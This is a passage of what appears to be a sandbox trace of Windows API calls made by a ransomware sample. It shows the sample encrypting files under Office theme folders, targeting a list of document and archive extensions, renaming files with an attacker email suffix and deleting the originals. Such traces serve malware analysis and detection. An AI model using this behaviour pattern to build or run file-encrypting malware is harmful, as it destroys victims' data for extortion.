lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.420] SetEndOfFile (hFile=0x1fc) returned 1 [0046.420] CloseHandle (hObject=0x1fc) returned 1 [0046.420] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.420] SetEndOfFile (hFile=0x174) returned 1 [0046.421] CloseHandle (hObject=0x174) returned 1 [0046.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.421] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1 [0046.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.422] lstrlenW (lpString=".doc") returned 4 [0046.422] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.422] lstrlenW (lpString=".docx") returned 5 [0046.422] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.422] lstrlenW (lpString=".pdf") returned 4 [0046.422] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.422] lstrlenW (lpString=".xls") returned 4 [0046.422] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.422] lstrlenW (lpString=".xlsx") returned 5 [0046.422] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.422] lstrlenW (lpString=".ppt") returned 4 [0046.422] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.422] lstrlenW (lpString=".zip") returned 4 [0046.422] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.422] lstrlenW (lpString=".rar") returned 4 [0046.422] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.422] lstrlenW (lpString=".bz2") returned 4 [0046.422] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.422] lstrlenW (lpString=".7z") returned 3 [0046.422] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.422] lstrlenW (lpString=".dbf") returned 4 [0046.422] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.422] lstrlenW (lpString=".1cd") returned 4 [0046.422] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.422] lstrlenW (lpString=".jpg") returned 4 [0046.422] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.423] lstrlenW (lpString=".doc") returned 4 [0046.423] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.423] lstrlenW (lpString=".docx") returned 5 [0046.423] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.423] lstrlenW (lpString=".pdf") returned 4 [0046.423] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.423] lstrlenW (lpString=".xls") returned 4 [0046.423] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.423] lstrlenW (lpString=".xlsx") returned 5 [0046.423] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.423] lstrlenW (lpString=".ppt") returned 4 [0046.423] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.423] lstrlenW (lpString=".zip") returned 4 [0046.423] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.423] lstrlenW (lpString=".rar") returned 4 [0046.423] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.423] lstrlenW (lpString=".bz2") returned 4 [0046.423] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.423] lstrlenW (lpString=".7z") returned 3 [0046.423] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.423] lstrlenW (lpString=".dbf") returned 4 [0046.423] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.423] lstrlenW (lpString=".1cd") returned 4 [0046.423] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0046.423] lstrlenW (lpString=".jpg") returned 4 [0046.423] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.423] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.424] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.424] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2476) returned 1 [0046.424] CloseHandle (hObject=0x174) returned 1 [0046.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 0x20 [0046.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.424] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.424] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.426] GetLastError () returned 0x0 [0046.426] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x9ac, lpOverlapped=0x0) returned 1 [0046.427] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x9b0, lpOverlapped=0x0) returned 1 [0046.428] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.428] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.428] SetEndOfFile (hFile=0x1fc) returned 1 [0046.428] CloseHandle (hObject=0x1fc) returned 1 [0046.429] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.429] SetEndOfFile (hFile=0x174) returned 1 [0046.429] CloseHandle (hObject=0x174) returned 1 [0046.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.430] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 1 [0046.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.430] lstrlenW (lpString=".doc") returned 4 [0046.430] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.430] lstrlenW (lpString=".docx") returned 5 [0046.430] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.430] lstrlenW (lpString=".pdf") returned 4 [0046.430] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.430] lstrlenW (lpString=".xls") returned 4 [0046.430] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.430] lstrlenW (lpString=".xlsx") returned 5 [0046.430] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.430] lstrlenW (lpString=".ppt") returned 4 [0046.430] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.430] lstrlenW (lpString=".zip") returned 4 [0046.430] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.430] lstrlenW (lpString=".rar") returned 4 [0046.430] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.430] lstrlenW (lpString=".bz2") returned 4 [0046.430] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.430] lstrlenW (lpString=".7z") returned 3 [0046.430] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.430] lstrlenW (lpString=".dbf") returned 4 [0046.430] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString=".1cd") returned 4 [0046.431] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString=".jpg") returned 4 [0046.431] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString=".doc") returned 4 [0046.431] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.431] lstrlenW (lpString=".docx") returned 5 [0046.431] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.431] lstrlenW (lpString=".pdf") returned 4 [0046.431] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.431] lstrlenW (lpString=".xls") returned 4 [0046.431] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.431] lstrlenW (lpString=".xlsx") returned 5 [0046.431] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.431] lstrlenW (lpString=".ppt") returned 4 [0046.431] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString=".zip") returned 4 [0046.431] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.431] lstrlenW (lpString=".rar") returned 4 [0046.431] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.431] lstrlenW (lpString=".bz2") returned 4 [0046.431] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.431] lstrlenW (lpString=".7z") returned 3 [0046.431] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString=".dbf") returned 4 [0046.431] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.431] lstrlenW (lpString=".1cd") returned 4 [0046.431] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0046.432] lstrlenW (lpString=".jpg") returned 4 [0046.432] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.432] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.432] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.432] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=19485) returned 1 [0046.432] CloseHandle (hObject=0x174) returned 1 [0046.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 0x20 [0046.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.432] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.432] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.433] GetLastError () returned 0x0 [0046.433] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x4c1d, lpOverlapped=0x0) returned 1 [0046.434] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0046.435] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.435] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.436] SetEndOfFile (hFile=0x1fc) returned 1 [0046.436] CloseHandle (hObject=0x1fc) returned 1 [0046.436] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.436] SetEndOfFile (hFile=0x174) returned 1 [0046.437] CloseHandle (hObject=0x174) returned 1 [0046.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.437] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1 [0046.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.437] lstrlenW (lpString=".doc") returned 4 [0046.437] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.437] lstrlenW (lpString=".docx") returned 5 [0046.437] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.437] lstrlenW (lpString=".pdf") returned 4 [0046.437] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.437] lstrlenW (lpString=".xls") returned 4 [0046.437] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.437] lstrlenW (lpString=".xlsx") returned 5 [0046.437] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.437] lstrlenW (lpString=".ppt") returned 4 [0046.437] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.437] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.437] lstrlenW (lpString=".zip") returned 4 [0046.438] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.438] lstrlenW (lpString=".rar") returned 4 [0046.438] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.438] lstrlenW (lpString=".bz2") returned 4 [0046.438] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.438] lstrlenW (lpString=".7z") returned 3 [0046.438] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.438] lstrlenW (lpString=".dbf") returned 4 [0046.438] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.438] lstrlenW (lpString=".1cd") returned 4 [0046.438] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.438] lstrlenW (lpString=".jpg") returned 4 [0046.438] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.438] lstrlenW (lpString=".doc") returned 4 [0046.438] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.438] lstrlenW (lpString=".docx") returned 5 [0046.438] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.438] lstrlenW (lpString=".pdf") returned 4 [0046.438] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.438] lstrlenW (lpString=".xls") returned 4 [0046.438] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.438] lstrlenW (lpString=".xlsx") returned 5 [0046.438] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.438] lstrlenW (lpString=".ppt") returned 4 [0046.438] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.438] lstrlenW (lpString=".zip") returned 4 [0046.438] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.438] lstrlenW (lpString=".rar") returned 4 [0046.438] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.439] lstrlenW (lpString=".bz2") returned 4 [0046.439] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.439] lstrlenW (lpString=".7z") returned 3 [0046.439] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.439] lstrlenW (lpString=".dbf") returned 4 [0046.439] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.439] lstrlenW (lpString=".1cd") returned 4 [0046.439] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73 [0046.439] lstrlenW (lpString=".jpg") returned 4 [0046.439] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.439] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.439] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.439] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1232) returned 1 [0046.439] CloseHandle (hObject=0x174) returned 1 [0046.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 0x20 [0046.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.440] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.440] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.443] GetLastError () returned 0x0 [0046.443] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x4d0, lpOverlapped=0x0) returned 1 [0046.445] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x4e0, lpOverlapped=0x0) returned 1 [0046.446] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.446] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, 